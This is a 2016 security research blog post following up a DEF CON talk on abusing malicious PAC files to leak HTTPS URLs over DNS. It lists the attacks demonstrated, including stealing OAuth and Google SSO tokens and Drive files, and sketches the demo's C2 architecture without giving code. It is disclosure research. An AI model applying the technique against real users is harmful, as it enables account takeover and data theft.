Attacks on HTTPS via malicious PAC files

Attacks on HTTPS via malicious PAC files

In our last blog post, Sniffing HTTPS URLS with malicious PAC files, we described issues identified in the implementation of PAC files in various web browsers and operating systems. In this post we outline the risk of these issues, and proof of concept source for others to replicate this work.

By Alex Chapman and Paul Stone

10 Aug 2016

TL;DR: 

Presentation and Demonstations

These materials were first presented at our DEF CON presentation Toxic Proxies - Bypassing HTTPS and VPNs to Pwn Your Online Identity at DEF CON 24.

In our talk, we demonstrated several different attacks that are possible as a result of the PAC HTTPS leak. These include:

  • Passively monitoring the user's encrypted search queries and visited websites
  • Actively probing social media sites to discover the user's online identities and other information
  • Forcing OAuth authentication requests and stealing the resulting tokens, taking control of several user accounts
  • Stealing Google SSO tokens to gain partial access to the user's photos, email, calendar, and location history
  • Stealing files from the user's Google Drive account.

We have released a video demonstrating these attacks on Youtube. Updated slides from our talk are also available.

Implementation

To demonstrate our attacks, we wrote a Python script that runs a combined web server and DNS server. The architecture creates a Command & Control (C2) loop between the attacker's server and the user's browser.

As shown above, there are two components on each side. On the attacker's side are a web server and DNS server.

In the user's browser are both malicious JavaScript running on a webpage (for example a fake captive portal page) and a separate malicious PAC script. These have different capabilities - the web page can fetch commands from the attacker's server, force 3rd party URLs to load and control the PAC script (e.g. giving it rules about which URLs to block or leak). The PAC script encodes HTTPS URLs and command responses and leaks them to the attacker via DNS. The attack server can then use this data to make decisions and pass further instructions onto the JavaScript in the user's browser.

We have released the source code for our demo server, which is available on GitHub.

Contact and Follow-up

Alex and Paul both work in Context's Research team from their London office. See the contact page for how to get in touch.

Subscribe for more Research like this

About Alex Chapman and Paul Stone

CREST
CREST STAR
CHECK IT Health Check Service
CBEST
Cyber Essentials
CESG Certified Product
CESG Certified Service
First - Improving Security Together
BSI ISO 9001 FS 581360
BSI ISO 27001 IS 553326
PCI - Approved Scanning Vendor
NCSC CCSC - Assured Service Provider